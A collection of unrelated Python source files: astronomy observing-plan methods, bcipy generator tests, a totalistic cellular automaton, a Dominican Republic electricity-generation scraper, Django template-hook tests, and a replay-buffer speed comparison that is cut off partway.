def add_configuration(self,config_name,obstype=None,coordinates=None,coord_units=None,**kwargs):
'''
Add an observing configuration for this target, specifying as many fields as desired.
Parameters
----------
config_name: str
Name for this configuration. As names are eventually used in the exporting of targetlists, it is worth keeping the name short-ish, as many observatories have character limits on this column
obstype: str, optional, default None
For now, either 'imaging' or 'spectroscopy'. Some features later on depend on this.
coordinates: str or SkyCoord, optional, default None
If the coordinates of this configuration differ from the object coordinates or from other configurations, supply coordinates (either SkyCoord or string). If string, coord_units must be provided.
coord_units: tuple or str, optional, default None
If coordinates are provided as a string, a unit (e.g., (u.hourangle, u.deg) or 'deg') as accepted by SkyCoord is required.
**kwargs: optional
Any desired fields for this configuration one wants displayed later, e.g., slit pa, slit width, etc., can be added as keyword arguments with values, and will be stored.
Returns
-------
None
Sets
----
self.configs: dict
dictionary of all configuration specifications.
'''
if config_name in self.configs.keys():
cont = input(f'Config Name {config_name} already a configuration. Overwrite? [Enter yes, N for no]: ')
if cont.upper() == 'N':
return
self.configs[config_name] = {}
self.configs[config_name]['obstype']= obstype
if coordinates is not None:
if isinstance(coordinates,SkyCoord):
self.configs[config_name]['coordinates'] = coordinates
elif isinstance(coordinates,str):
if coord_units is None:
raise AssertionError('When providing string coordinates, a coordinate units accepted by SkyCoord are required to be passed to coord_units')
else:
self.configs[config_name]['coordinates'] = SkyCoord(coordinates,unit=coord_units)
elif self.coordinates is not None:
self.configs[config_name]['coordinates'] = self.coordinates
else:
self.configs[config_name]['coordinates'] = None
for i in kwargs.keys():
self.configs[config_name][i] = kwargs[i]
def remove_configuration(self,config_name):
'''
Remove a configuration from the list
Parameters
----------
config_name: str
the configuration name to remove
'''
try:
self.configs.pop(config_name)
except KeyError:
print('config not found')
return
def edit_configuration(self,config_name,quantity,value):
'''
Edit a configuration by changing the value in one of the columns.
Parameters
----------
config_name: str
the name of the configuration to edit
quantity: str
the name of the quantity (e.g., 'obstype', or a quantity added via keyword argument) to edit
value: Any
updated value. As a note, we recommend only using this for simple string/display values. Editing, e.g., coordinates this way does not run the code to make a new SkyCoord. To change the coordinates associated with a configuration, we suggest re-adding it (with the same name) but new coords to overwrite it.
'''
try:
self.configs[config_name][quantity] = value
except KeyError:
print('configuration name not found')
return
def add_offset_star(self,coordinate,coord_units=None,configurations='all'):
'''
Add an offset star to the configuration. Offset stars are used to execute blind offsets when a source is too faint to see in typical aquisition exposures.
If an offset star is provided, the offsets between the star and the configurations coordinates (in arcsec east and north) is automatically calculated and added to the configuration.
Parameters
----------
coordinate: str or SkyCoord
coordinates of the offset star. Either SkyCoord object or string. If string provided, must also provide coord_units for creation of SkyCoord object.
coord_units: tuple or str, optional, default None
if coordinates provided as a string, units acceptable by SkyCoord (e.g., (u.hourangle, u.deg) or 'deg') must be provided here.
configurations: str or list, optional, default 'all'
Which configurations to apply this offset star to. Default is 'all', one can pass individual configuration names as strings, or a list of configuration names (as strings).
Returns
-------
None
Sets
----
Sets the 'offset star' key for the chosen configuration(s) as the star coordinates and the 'offsets' key to the offsets, visible via view_configurations().
'''
if isinstance(coordinate,str):
if coord_units is not None:
coord = SkyCoord(coordinate,unit=coord_units)
else:
raise AssertionError('If string coordinate provided, units must be provided for SkyCoord creation')
elif isinstance(coordinate,SkyCoord):
coord = coordinate
if configurations=='all':
for i in self.configs.keys():
os = coord.spherical_offsets_to(self.configs[i]['coordinates'])
os = [os[0].to(u.arcsec).value,os[1].to(u.arcsec).value]
add_str = f'''{os[0]:.3f}'' E, {os[1]:.3f}'' N'''
self.configs[i]['offset star'] = coord
self.configs[i]['offsets'] = add_str
elif isinstance(configurations,str):
os = coord.spherical_offsets_to(self.configs[configurations]['coordinates'])
os = [os[0].to(u.arcsec).value,os[1].to(u.arcsec).value]
add_str = f'''{os[0]:.3f}'' E, {os[1]:.3f}'' N'''
self.configs[configurations]['offset star'] = coord
self.configs[configurations]['offsets'] = add_str
elif isinstance(configurations,list):
for i in configurations:
os = coord.spherical_offsets_to(self.configs[i]['coordinates'])
os = [os[0].to(u.arcsec).value,os[1].to(u.arcsec).value]
add_str = f'''{os[0]:.3f}'' E, {os[1]:.3f}'' N'''
self.configs[i]['offset star'] = coord
self.configs[i]['offsets'] = add_str
def set_survey(self,survey_name):
self.survey_name = survey_name
def retrieve_finder_chart(self,config_name,size,pixels=500,show_aperture=True,**implot_kwargs):
'''
Retrieve a DSS image (finder chart) around the target. If obsmode is spectroscopy, optionally show the location of the slit or circular fiber on the image.
Parameters
----------
config_name: str
name of the configuration to retrieve finder for
size: astropy Quantity
dimensions of the finder box to use. Box is square.
pixels: int, optional (default 500)
dimensions (in pixels) of the image to retrieve. (Larger downloads take longer).
show_aperture: bool, optional (default True)
flag for whether to show an apertuer (rectangular slits and circular apertures supported). If this flag turned on, the following must be true.
For slits, your configuration must have properties `slit_width`, `slit_length`, and `PA`.
For circular apertures, your configuration must have a property `fiber_radius`.
**implot_kwargs: optional
arguments passed to the utility function `implot` to display the image. These include scale (images are scaled about their mean pixel value), colorbar flag, etc.
Returns
-------
fig, ax: matplotlib figure and axes objects
the fig and ax on which the dss image and possible aperture was plotted.
'''
sv = SkyView()
if hasattr(self,'survey_name'):
survey=self.survey_name
else:
survey='SDSSdr7g'
paths = sv.get_images(position=self.configs[config_name]['coordinates'],
survey=[survey],
coordinates='J2000',
width=size,
height=size,
grid=True,
gridlabels=True,
pixels=str(pixels))
image = paths[0][0].data
wcs = WCS(paths[0][0].header)
fig, ax = implot(image,wcs=wcs,cmap='gray',**implot_kwargs)
if show_aperture:
if self.configs[config_name].keys() >= {'slit_width','slit_length','PA'}:
slit = SkyRectangularAperture(self.configs[config_name]['coordinates'],
w=self.configs[config_name]['slit_width'],
h=self.configs[config_name]['slit_length'],
theta=self.configs[config_name]['PA']+90*u.deg)
slit.to_pixel(wcs).plot(color='r',lw=3)
elif self.configs[config_name].keys() >= {'fiber_radius'}:
fiber = SkyCircularAperture(self.configs[config_name]['coordinates'],
r=self.configs[config_name]['fiber_radius'])
fiber.to_pixel(wcs).plot(color='r',lw=3)
else:
raise KeyError('''show_slit set to true, but this configuration does not have 'slit_width','slit_length', and 'PA' set, which are needed for slit display, or 'fiber_radius' set, for circular aperture.''')
return fig, ax
def add_custom_image(self,config_name,image_name,image,wcs=None):
'''
Add a custom image of your target. Allows for your image to be added to the observing plan along with, e.g., retrieved DSS imaging.
Parameters
----------
config_name: str or list
configuration for which this image should apply. Can be a single configuration string, a list of configuration strings, or 'all'.
image_name: str
a name for the image (for later plotting and access).
image: array_like
the array containing the image
wcs: astropy.WCS, optional (default None)
a wcs object defining the coordinates of the image. This must be provided for some functionality, like overplotting slits/apertures.
'''
self.configs[config_name]['user_images'] = {}
self.configs[config_name]['user_images'][image_name] = {}
self.configs[config_name]['user_images'][image_name]['image'] = image
self.configs[config_name]['user_images'][image_name]['wcs'] = wcs
def show_custom_image(self,config_name,image_name,show_aperture=True,**implot_kwargs):
'''
Display the custom image provided by user. If possible, show aperture (slit/fiber) over it.
'''
image = self.configs[config_name]['user_images'][image_name]['image']
wcs = self.configs[config_name]['user_images'][image_name]['wcs']
fig, ax = implot(image,wcs=wcs,cmap='gray',**implot_kwargs)
if show_aperture:
if self.configs[config_name].keys() >= {'slit_width','slit_length','PA'}:
slit = SkyRectangularAperture(self.configs[config_name]['coordinates'],
w=self.configs[config_name]['slit_width'],
h=self.configs[config_name]['slit_length'],
theta=self.configs[config_name]['PA'])
slit.to_pixel(wcs).plot(color='r',lw=3)
elif self.configs[config_name].keys() >= {'fiber_radius'}:
fiber = SkyCircularAperture(self.configs[config_name]['coordinates'],
r=self.configs[config_name]['fiber_radius'])
fiber.to_pixel(wcs).plot(color='r',lw=3)
else:
raise KeyError('''show_slit set to true, but this configuration does not have 'slit_width','slit_length', and 'PA' set, which are needed for slit display, or 'fiber_radius' set, for circular aperture.''')
return fig, ax
def list_configurations(self):
df = pd.DataFrame.from_dict(self.configs,orient='index')
df['coordinates'] = [i.to_string() for i in df['coordinates'] if isinstance(i,SkyCoord)]
if 'offset star' in df.columns:
df['offset star'] = [i.to_string() if isinstance(i,SkyCoord) else np.nan for i in df['offset star']]
if 'user_images' in df.columns:
df['user_images'] = ['Y' if isinstance(i,dict) else np.nan for i in df['user_images']]
df.index.name = 'configurations'
df = df.replace({np.nan: '---'})
return df
def nudge_configuration(self,config_name,arcsec_east,arcsec_north):
'''
Nudge the coordinates of a configuration east or north in arcsec
for better alignment.
Parameters
----------
config_name: str
name of configuration to nudge
arcsec_east: float
amount to nudge east (west is negative) in arcsec
arcsec_north: float
amount to nudge north (south is negative) in arcsec
'''
new_coordinate = self.configs[config_name]['coordinates'].directional_offset_by(0,arcsec_north*u.arcsec)
new_coordinate = new_coordinate.directional_offset_by(90,arcsec_east*u.arcsec)
self.configs[config_name]['coordinates'] = new_coordinate
@property
def configurations(self):
return self.list_configurations() |
the-stack_0_12379 | # pylint: disable=too-few-public-methods,no-self-use
"""Tests for datastream generator module"""
from builtins import next
import unittest
import pytest
from past.builtins import map, range
from mock import mock_open, patch
from bcipy.acquisition.datastream.generator import random_data, file_data
from bcipy.acquisition.util import mock_data
class CustomEncoder():
"""Encodes data by prefixing with the count."""
def __init__(self):
super(CustomEncoder, self).__init__()
self.counter = 0
def encode(self, data):
"""Encode the data."""
self.counter += 1
return (self.counter, data)
class TestGenerator(unittest.TestCase):
"""Tests for Generator"""
def test_random_generator(self):
"""Test default parameters for random generator"""
gen = random_data()
data = [next(gen) for _ in range(100)]
self.assertEqual(len(data), 100)
def test_random_high_low_values(self):
"""Random generator should allow user to set value ranges."""
channel_count = 10
low = -100
high = 100
gen = random_data(low=-100, high=100,
channel_count=channel_count)
data = [next(gen) for _ in range(100)]
self.assertEqual(len(data), 100)
for record in data:
self.assertEqual(len(record), channel_count)
for value in record:
self.assertTrue(low <= value <= high)
def test_random_with_custom_encoder(self):
"""Random generator should allow a custom encoder."""
channel_count = 10
gen = random_data(encoder=CustomEncoder(),
channel_count=channel_count)
data = [next(gen) for _ in range(100)]
self.assertEqual(len(data), 100)
for _count, record in data:
self.assertEqual(len(record), channel_count)
self.assertEqual(data[0][0], 1)
self.assertEqual(data[99][0], 100)
def test_file_generator(self):
"""Should stream data from a file."""
row_count = 100
header = ['col1,col2,col3']
data = list(mock_data(row_count, len(header)))
rows = map(lambda x: ','.join(map(str, x)), data)
test_data = '\n'.join(header + rows)
with patch('bcipy.acquisition.datastream.generator.open',
mock_open(read_data=test_data), create=True):
gen = file_data(filename='foo', header_row=1)
generated_data = [next(gen) for _ in range(row_count)]
for i, row in enumerate(generated_data):
self.assertEqual(row, data[i])
def test_file_generator_end(self):
"""Should throw an exception when all data has been consumed"""
row_count = 10
header = ['col1,col2,col3']
data = list(mock_data(row_count, len(header)))
rows = map(lambda x: ','.join(map(str, x)), data)
test_data = '\n'.join(header + rows)
with patch('bcipy.acquisition.datastream.generator.open',
mock_open(read_data=test_data), create=True):
gen = file_data(filename='foo', header_row=1)
# exhaust the generator
for _ in range(row_count):
next(gen)
with pytest.raises(StopIteration):
data.append(next(gen))
def test_file_with_custom_encoder(self):
"""Should allow a custom encoder"""
col_count = 3
row_count = 100
header = ['col1,col2,col3']
data = [[float(cnum + rnum) for cnum in range(col_count)]
for rnum in range(row_count)]
rows = map(lambda x: ','.join(map(str, x)), data)
test_data = '\n'.join(header + rows)
with patch('bcipy.acquisition.datastream.generator.open',
mock_open(read_data=test_data), create=True):
gen = file_data(
filename='foo', header_row=1, encoder=CustomEncoder())
generated_data = [next(gen) for _ in range(row_count)]
for _count, record in generated_data:
self.assertEqual(len(record), col_count)
self.assertEqual(generated_data[0][0], 1)
self.assertEqual(generated_data[99][0], 100)
|
the-stack_0_12382 | # Author:
# Adapted from code in Think Complexity, 2nd Edition, by by Allen Downey
import sys
import numpy as np
rule_width = 7
def make_table(rule_num):
"""Make the table for a given CA rule.
rule: int 0-2186
returns: array of 7 0s, 1s, and 2s
"""
rule_set = [0] * rule_width
num = rule_num
for i in range(rule_width):
rule_set[i] = num % 3
num = num // 3
rule_set.reverse()
print("number: ", rule_num)
print("rule_set:", rule_set)
return rule_set
class TotalisticCell1D:
"""Represents a 1-D, three-state, totalistic cellular automaton"""
def __init__(self, rule_num, gen_count, m=None):
"""Initializes the CA.
rule: integer
n: number of rows
m: number of columns
Attributes:
table: rule dictionary that maps from triple to next state.
array: the numpy array that contains the data.
next: the index of the next empty row.
"""
self.rule_width = 7
self.table = make_table(rule_num)
self.n = gen_count
self.width = 2 * gen_count + 1 if m is None else m
self.array = np.zeros((gen_count, self.width), dtype=np.int8)
self.next = 0
def start_single(self):
"""Starts with one cell in the middle of the top row."""
self.array[0, self.width // 2] = 1
self.next += 1
def start_random(self):
"""Start with random values in the top row."""
self.array[0] = np.random.random(self.width).round()
self.next += 1
def start_string(self, s):
"""Start with values from a string of 1s and 0s."""
s_len = len(s)
# Check string length
assert s_len <= self.width
padding_len = self.width - s_len
left_padding_len = padding_len // 2
ss = "0" * left_padding_len + s
right_padding_len = self.width - len(ss)
sss = ss + "0" * right_padding_len
self.array[0] = np.array([int(x) for x in sss])
self.next += 1
def loop(self, steps=1):
"""Executes the given number of time steps."""
for i in range(steps):
if i % 1024 == 0:
print("step {} of {}".format(i, self.n))
self.step()
def step(self):
"""Executes one time step by computing the next row of the array."""
a = self.array
i = self.next
window = [1, 1, 1]
row = self.array[i - 1]
correlated_row = np.correlate(row, window, mode="same")
next_row = np.array([self.table[7 - total - 1] for total in correlated_row])
a[i] = next_row
self.next += 1
def print_ca(self, start=0, end=None, fid=None):
"""Prints the CA.
start: index of the first column to be shown
end: index of the last column to be shown
"""
a = self.array[:, start:end]
if fid:
np.savetxt(fid, a, delimiter="", fmt='%1d', )
else:
for row in a:
print(row)
def draw_ca(rule_num, gen_count=32, fid=None, start=None):
"""Makes and prints a 1D, three-state, totalistic CA with a given rule.
rule: int rule number
n: number of rows
"""
ca = TotalisticCell1D(rule_num, gen_count)
if start is None:
ca.start_single()
else:
ca.start_string(start)
ca.loop(gen_count - 1)
ca.print_ca(fid=fid)
def write_ca(gen_count=16, start=None):
rule_num = 1635
if start is None:
file_name = "out/ca/{}_{:05d}.txt".format(rule_num, gen_count)
else:
file_name = "out/ca/{}_{:05d}_{}.txt".format(rule_num, gen_count, start)
fid = file_name
draw_ca(rule_num, gen_count, fid, start)
if __name__ == "__main__":
n = int(sys.argv[1])
if len(sys.argv) > 2:
seed = sys.argv[2]
write_ca(n, seed)
else:
write_ca(n)
|
the-stack_0_12383 | #!/usr/bin/env python3
import arrow
from bs4 import BeautifulSoup
from collections import defaultdict
import logging
from math import isnan
import numpy as np
from operator import itemgetter
import pandas as pd
import requests
# This parser gets hourly electricity generation data from oc.org.do for the Dominican Republic.
# The data is in MWh but since it is updated hourly we can view it as MW.
# Solar generation now has some data available but multiple projects are planned/under construction.
url = 'http://190.122.102.21:8084/reportesgraficos/reportepostdespacho.aspx'
total_mapping = {
u'Total T\xe9rmico': 'Thermal',
u'Total E\xf3lico': 'Wind',
u'Total Hidroel\xe9ctrica': 'Hydro',
u'Total Solar': 'Solar',
u'Total Generado': 'Generated'
}
# Power plant types
# http://www.sie.gob.do/images/Estadisticas/MEM/GeneracionDiariaEnero2017/
# Reporte_diario_de_generacion_31_enero_2017_merged2.pdf
thermal_plants = {
u'AES ANDRES': 'gas',
u'BARAHONA CARBON': 'coal',
u'BERSAL': 'oil',
u'CEPP 1': 'oil',
u'CEPP 2': 'oil',
u'CESPM 1': 'oil',
u'CESPM 2': 'oil',
u'CESPM 3': 'oil',
u'ESTRELLA DEL MAR 2 CFO': 'oil',
u'ESTRELLA DEL MAR 2 CGN': 'gas',
u'ESTRELLA DEL MAR 2 SFO': 'oil',
u'ESTRELLA DEL MAR 2 SGN': 'gas',
u'GENERACI\xD3N DE EMERGENCIA AES ANDR\xC9S': 'gas',
u'HAINA TG': 'oil',
u'INCA KM22': 'oil',
u'ITABO 1': 'coal',
u'ITABO 2': 'coal',
u'LA VEGA': 'oil',
u'LOS MINA 5': 'gas',
u'LOS MINA 6': 'gas',
u'LOS MINA 7': 'gas',
u'LOS OR\xcdGENES POWER PLANT FUEL OIL': 'oil',
u'LOS OR\xcdGENES POWER PLANT GAS NATURAL': 'gas',
u'METALDOM': 'oil',
u'MONTE RIO': 'oil',
u'PALAMARA': 'oil',
u'PALENQUE': 'oil',
u'PARQUE ENERGETICO LOS MINA CC PARCIAL': 'gas',
u'PARQUE ENERGETICO LOS MINA CC TOTAL': 'gas',
u'PIMENTEL 1': 'oil',
u'PIMENTEL 2': 'oil',
u'PIMENTEL 3': 'oil',
u'PUNTA CATALINA 1': 'coal',
u'PUNTA CATALINA 2': 'coal',
u'QUISQUEYA 1': 'gas',
u'QUISQUEYA 2': 'gas',
u'QUISQUEYA 1 SAN PEDRO': 'oil',
u'RIO SAN JUAN': 'oil',
u'SAN FELIPE': 'oil',
u'SAN FELIPE CC': 'gas',
u'SAN FELIPE VAP': 'oil',
u'SAN LORENZO 1': 'gas',
u'SAN PEDRO BIO-ENERGY': 'biomass',
u'SAN PEDRO VAPOR': 'oil',
u'SULTANA DEL ESTE': 'oil'
}
def get_data(session=None):
"""
Makes a request to source url.
Finds main table and creates a list of all table elements in string format.
Returns a list.
"""
data = []
s = session or requests.Session()
data_req = s.get(url)
soup = BeautifulSoup(data_req.content, 'lxml')
tbs = soup.find("table", id="PostdespachoUnidadesTermicasGrid_DXMainTable")
rows = tbs.find_all("td")
for row in rows:
num = row.getText().strip()
data.append(str(num))
return data
def floater(item):
"""
Attempts to convert any item given to a float. Returns item if it fails.
"""
try:
return float(item)
except ValueError:
return item
def chunker(big_lst):
"""
Breaks a big list into a list of lists. Removes any list with no data then turns remaining
lists into key: value pairs with first element from the list being the key.
Returns a dictionary.
"""
chunks = [big_lst[x:x + 27] for x in range(0, len(big_lst), 27)]
# Remove the list if it contains no data.
for chunk in chunks:
if any(chunk):
continue
else:
chunks.remove(chunk)
chunked_list = {words[0]: words[1:] for words in chunks}
return chunked_list
def data_formatter(data):
"""
Takes data and finds relevant sections. Formats and breaks data into usable parts.
Returns a nested dictionary.
"""
find_thermal_index = data.index(u'GRUPO: T\xe9rmica')
find_totals_index = data.index(u'Total T\xe9rmico')
find_totals_end = data.index(u'Total Programado')
ufthermal = data[find_thermal_index + 3:find_totals_index - 59]
total_data = data[find_totals_index:find_totals_end]
# Remove all company names.
for val in ufthermal:
if ':' in val:
i = ufthermal.index(val)
del ufthermal[i:i + 3]
formatted_thermal = chunker([floater(item) for item in ufthermal])
mapped_totals = [total_mapping.get(x, x) for x in total_data]
formatted_totals = chunker([floater(item) for item in mapped_totals])
return {'totals': formatted_totals, 'thermal': formatted_thermal}
def data_parser(formatted_data):
"""
Converts formatted data into a pandas dataframe. Removes any empty rows.
Returns a DataFrame.
"""
hours = list(range(1, 24)) + [0] + [25, 26]
dft = pd.DataFrame(formatted_data, index=hours)
dft = dft.drop(dft.index[[-1, -2]])
dft = dft.replace(u'', np.nan)
dft = dft.dropna(how='all')
return dft
def thermal_production(df, logger):
"""
Takes DataFrame and finds thermal generation for each hour.
Removes any non generating plants then maps plants to type.
Sums type instances and returns a dictionary.
"""
therms = []
unmapped = set()
for hour in df.index.values:
dt = hour
currentt = df.loc[[hour]]
# Create current plant output.
tp = {}
for item in list(df):
v = currentt.iloc[0][item]
tp[item] = v
current_plants = {k: tp[k] for k in tp if not isnan(tp[k])}
for plant in current_plants.keys():
if plant not in thermal_plants.keys():
unmapped.add(plant)
mapped_plants = [(thermal_plants.get(plant, 'unknown'), val) for plant, val in current_plants.items()]
thermalDict = defaultdict(lambda: 0.0)
# Sum values for duplicate keys.
for key, val in mapped_plants:
thermalDict[key] += val
thermalDict['datetime'] = dt
thermalDict = dict(thermalDict)
therms.append(thermalDict)
for plant in unmapped:
logger.warning(
'{} is missing from the DO plant mapping!'.format(plant),
extra={'key': 'DO'})
return therms
def total_production(df):
"""
Takes DataFrame and finds generation totals for each hour.
Returns a dictionary.
"""
vals = []
# The Dominican Republic does not observe daylight savings time.
for hour in df.index.values:
dt = hour
current = df.loc[[hour]]
hydro = current.iloc[0]['Hydro']
wind = current.iloc[0]['Wind']
solar = current.iloc[0]['Solar']
if wind > -10:
wind = max(wind, 0)
# Wind and hydro totals do not always update exactly on the new hour.
# In this case we set them to None because they are unknown rather than zero.
if isnan(wind):
wind = None
if isnan(hydro):
hydro = None
prod = {'wind': wind, 'hydro': hydro, 'solar': solar, 'datetime': dt}
vals.append(prod)
return vals
def merge_production(thermal, total):
"""
Takes thermal generation and total generation and merges them using 'datetime' key.
Returns a defaultdict.
"""
d = defaultdict(dict)
for each in (thermal, total):
for elem in each:
d[elem['datetime']].update(elem)
final = sorted(d.values(), key=itemgetter("datetime"))
def get_datetime(hour):
at = arrow.now('America/Dominica').floor('day')
dt = (at.shift(hours=int(hour) - 1)).datetime
return dt
for item in final:
i = item['datetime']
j = get_datetime(i)
item['datetime'] = j
return final
def fetch_production(zone_key='DO', session=None, target_datetime=None, logger=logging.getLogger(__name__)):
"""
Requests the last known production mix (in MW) of a given country
Arguments:
zone_key (optional) -- used in case a parser is able to fetch multiple countries
Return:
A dictionary in the form:
{
'zoneKey': 'FR',
'datetime': '2017-01-01T00:00:00Z',
'production': {
'biomass': 0.0,
'coal': 0.0,
'gas': 0.0,
'hydro': 0.0,
'nuclear': null,
'oil': 0.0,
'solar': 0.0,
'wind': 0.0,
'geothermal': 0.0,
'unknown': 0.0
},
'storage': {
'hydro': -10.0,
},
'source': 'mysource.com'
}
"""
if target_datetime:
raise NotImplementedError('This parser is not yet able to parse past dates')
dat = data_formatter(get_data(session=None))
tot = data_parser(dat['totals'])
th = data_parser(dat['thermal'])
thermal = thermal_production(th, logger)
total = total_production(tot)
merge = merge_production(thermal, total)
production_mix_by_hour = []
for hour in merge:
production_mix = {
'zoneKey': zone_key,
'datetime': hour['datetime'],
'production': {
'biomass': hour.get('biomass', 0.0),
'coal': hour.get('coal', 0.0),
'gas': hour.get('gas', 0.0),
'hydro': hour.get('hydro', 0.0),
'nuclear': 0.0,
'oil': hour.get('oil', 0.0),
'solar': hour.get('solar', 0.0),
'wind': hour.get('wind', 0.0),
'geothermal': 0.0,
'unknown': hour.get('unknown', 0.0)
},
'storage': {
'hydro': None,
},
'source': 'oc.org.do'
}
production_mix_by_hour.append(production_mix)
return production_mix_by_hour
if __name__ == '__main__':
"""Main method, never used by the Electricity Map backend, but handy for testing."""
print('fetch_production() ->')
print(fetch_production())
|
the-stack_0_12388 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase
from django.template import Template, Context
from django.utils.html import mark_safe
from hooks.templatehook import hook
from hooks.templatetags.hooks_tags import template_hook_collect
from . import utils_hooks
class HookTagTest(TestCase):
def setUp(self):
self.hook_name = 'myhook'
hook.unregister_all(self.hook_name)
utils_hooks.myhook.unregister_all()
def test_hook_tag(self):
def func(context, *args, **kwargs):
self.assertEqual(args, ("foobar", ))
self.assertEqual(kwargs, {'bar': "bar", })
self.assertEqual(context['foo'], "foo")
return "hello"
hook.register(self.hook_name, func)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' bar='bar' %}"
).render(Context({"hook_name": self.hook_name, "foo": "foo", }))
self.assertEqual(out, u"hello")
def test_hook_tag_many(self):
"""
Should join multiple responses
"""
def func_a(*args, **kwargs):
return "hello"
def func_b(*args, **kwargs):
return "goodbye"
hook.register(self.hook_name, func_a)
hook.register(self.hook_name, func_b)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' %}"
).render(Context({"hook_name": self.hook_name, }))
self.assertEqual(out, "hello\ngoodbye")
def test_hook_tag_escaped(self):
"""
Should escape responses (if they are not marked as safe)
"""
def func(*args, **kwargs):
return "<span>hello</span>"
hook.register(self.hook_name, func)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' %}"
).render(Context({"hook_name": self.hook_name, }))
self.assertEqual(out, "<span>hello</span>")
def test_hook_tag_mark_safe(self):
"""
Should not escape safe strings
"""
def func(*args, **kwargs):
return mark_safe("<span>hello</span>")
hook.register(self.hook_name, func)
out = Template(
"{% load hooks_tags %}"
"{% hook hook_name 'foobar' %}"
).render(Context({"hook_name": self.hook_name, }))
self.assertEqual(out, "<span>hello</span>")
def test_template_hook_collect(self):
def func(context, *args, **kwargs):
self.assertEqual(context, "context")
self.assertEqual(args, ("foo", ))
self.assertEqual(kwargs, {'extra': "bar", })
return "hello"
utils_hooks.myhook.register(func)
res = template_hook_collect(utils_hooks, 'myhook', "context", "foo", extra="bar")
self.assertEqual(res, u"hello")
res = template_hook_collect(utils_hooks, 'badhook')
self.assertEqual(res, u"")
def test_template_hook_collect_escaped(self):
def func(*args, **kwargs):
return "<span>hello</span>"
utils_hooks.myhook.register(func)
res = template_hook_collect(utils_hooks, 'myhook', "context", "foo", extra="bar")
self.assertEqual(res, "<span>hello</span>")
|
the-stack_0_12389 | import os
import sys
from time import time as timer
import gym
import torch
import numpy as np
import numpy.random as rd
'''
2020-0505 ZenJiaHao Github: YonV1943
Compare the running speed of different ReplayBuffer(Memory) implement.
ReplayBuffer UsedTime(s) Storage(memories)
MemoryList: 24 list()
MemoryTuple: 20 collections.namedtuple
MemoryArray: 13 numpy.array
MemoryTensor: 13 torch.tensor (GPU/CPU)
'''
class BufferList:
def __init__(self, memo_max_len):
self.memories = list()
self.max_len = memo_max_len
self.now_len = len(self.memories)
def add_memo(self, memory_tuple):
self.memories.append(memory_tuple)
def init_after_add_memo(self):
del_len = len(self.memories) - self.max_len
if del_len > 0:
del self.memories[:del_len]
# print('Length of Deleted Memories:', del_len)
self.now_len = len(self.memories)
def random_sample(self, batch_size, device):
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# indices = rd.choice(self.memo_len, batch_size, replace=False) # why perform worse?
# indices = rd.choice(self.memo_len, batch_size, replace=True) # why perform better?
# same as:
indices = rd.randint(self.now_len, size=batch_size)
'''convert list into array'''
arrays = [list()
for _ in range(5)] # len(self.memories[0]) == 5
for index in indices:
items = self.memories[index]
for item, array in zip(items, arrays):
array.append(item)
'''convert array into torch.tensor'''
tensors = [torch.tensor(np.array(ary), dtype=torch.float32, device=device)
for ary in arrays]
return tensors
class BufferTuple:
def __init__(self, memo_max_len):
self.memories = list()
self.max_len = memo_max_len
self.now_len = None # init in init_after_add_memo()
from collections import namedtuple
self.transition = namedtuple(
'Transition', ('reward', 'mask', 'state', 'action', 'next_state',)
)
def add_memo(self, args):
self.memories.append(self.transition(*args))
def init_after_add_memo(self):
del_len = len(self.memories) - self.max_len
if del_len > 0:
del self.memories[:del_len]
# print('Length of Deleted Memories:', del_len)
self.now_len = len(self.memories)
def random_sample(self, batch_size, device):
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# indices = rd.choice(self.memo_len, batch_size, replace=False) # why perform worse?
# indices = rd.choice(self.memo_len, batch_size, replace=True) # why perform better?
# same as:
indices = rd.randint(self.now_len, size=batch_size)
'''convert tuple into array'''
arrays = self.transition(*zip(*[self.memories[i] for i in indices]))
'''convert array into torch.tensor'''
tensors = [torch.tensor(np.array(ary), dtype=torch.float32, device=device)
for ary in arrays]
return tensors
class BufferArray: # 2020-05-20
def __init__(self, memo_max_len, state_dim, action_dim, ):
memo_dim = 1 + 1 + state_dim + action_dim + state_dim
self.memories = np.empty((memo_max_len, memo_dim), dtype=np.float32)
self.next_idx = 0
self.is_full = False
self.max_len = memo_max_len
self.now_len = self.max_len if self.is_full else self.next_idx
self.state_idx = 1 + 1 + state_dim # reward_dim==1, done_dim==1
self.action_idx = self.state_idx + action_dim
def add_memo(self, memo_tuple):
self.memories[self.next_idx] = np.hstack(memo_tuple)
self.next_idx = self.next_idx + 1
if self.next_idx >= self.max_len:
self.is_full = True
self.next_idx = 0
def init_after_add_memo(self):
self.now_len = self.max_len if self.is_full else self.next_idx
def random_sample(self, batch_size, device):
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# indices = rd.choice(self.memo_len, batch_size, replace=False) # why perform worse?
# indices = rd.choice(self.memo_len, batch_size, replace=True) # why perform better?
# same as:
indices = rd.randint(self.now_len, size=batch_size)
memory = self.memories[indices]
memory = torch.tensor(memory, device=device)
'''convert array into torch.tensor'''
tensors = (
memory[:, 0:1], # rewards
memory[:, 1:2], # masks, mark == (1-float(done)) * gamma
memory[:, 2:self.state_idx], # states
memory[:, self.state_idx:self.action_idx], # actions
memory[:, self.action_idx:], # next_states
)
return tensors
def uniform_exploration(env, max_step, max_action, gamma, reward_scale, memo, action_dim):
state = env.reset()
rewards = list()
reward_sum = 0.0
steps = list()
step = 0
global_step = 0
while global_step < max_step:
# action = np.tanh(rd.normal(0, 0.5, size=action_dim)) # zero-mean gauss exploration
action = rd.uniform(-1.0, +1.0, size=action_dim) # uniform exploration
next_state, reward, done, _ = env.step(action * max_action)
reward_sum += reward
step += 1
adjust_reward = reward * reward_scale
mask = 0.0 if done else gamma
memo.add_memo((adjust_reward, mask, state, action, next_state))
state = next_state
if done:
rewards.append(reward_sum)
steps.append(step)
global_step += step
state = env.reset() # reset the environment
reward_sum = 0.0
step = 1
memo.init_after_add_memo()
return rewards, steps
def run_compare_speed_of_replay_buffer():
from AgentRun import get_env_info
os.environ['CUDA_VISIBLE_DEVICES'] = '3' # sys.argv[-1][-4]
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
batch_size = 2 ** 8
max_step = 2 ** 10
gamma = 0.99
reward_scale = 1
memo_max_len = 2 ** 13
start_time = timer()
for env_name in ("LunarLanderContinuous-v2", "BipedalWalker-v3"):
env = gym.make(env_name)
state_dim, action_dim, max_action, target_reward = get_env_info(env)
# memo = MemoryList(memo_max_len)
